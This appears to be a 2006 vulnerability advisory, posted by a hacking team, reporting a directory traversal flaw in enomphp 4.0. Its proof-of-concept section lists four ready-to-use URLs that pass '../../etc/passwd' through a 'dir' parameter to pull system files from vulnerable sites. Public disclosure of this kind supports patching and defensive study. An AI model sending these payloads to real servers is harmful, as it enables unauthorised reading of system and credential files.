Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

phpPC 1.04 Multiples Remote File Inclusion

Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities

PhotoCart 3.9 (adminprint. php) Remote File Include Vulnerability

Vulnerability in PostNuke

From:	the_3dit0r_(at)_yahoo.com <the_3dit0r_(at)_yahoo.com>
Date:	22.11.2006
Subject:	enomphp => 4.0 Remote Traversal Directory

""""""""""""""
""""""""""""""
""""""""""""""
"""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
""""""""""""""
""""""""""""""
""""""""""""""
"""""
       Xmor$ DigitaL Hacking TeaM


# enomphp  => 4.0  Remote Traversal Directory
# Script.............. : enomphp
# Discovered by.... : the_Edit0r        
# Location .......... : Iran
# Class..............  : Traversal Directory
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r
#      D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
#  ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
#   Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

# proof Of Concept :
Www.Site.coM/[path]/config.php?dir=../../../../../../../etc/passwd
Www.Site.coM/[path]/ranklv_inside.php?dir=../../../../../../../etc/passwd
Www.Site.coM/[path]/rankml_inside.php?dir=../../../../../../../etc/passwd
www.Site.com/[path]/admin/Restore/config.php?dir=../../../../../../..
/etc/passwd

#Contact me : the_3dit0r[at]Yahoo[dot]coM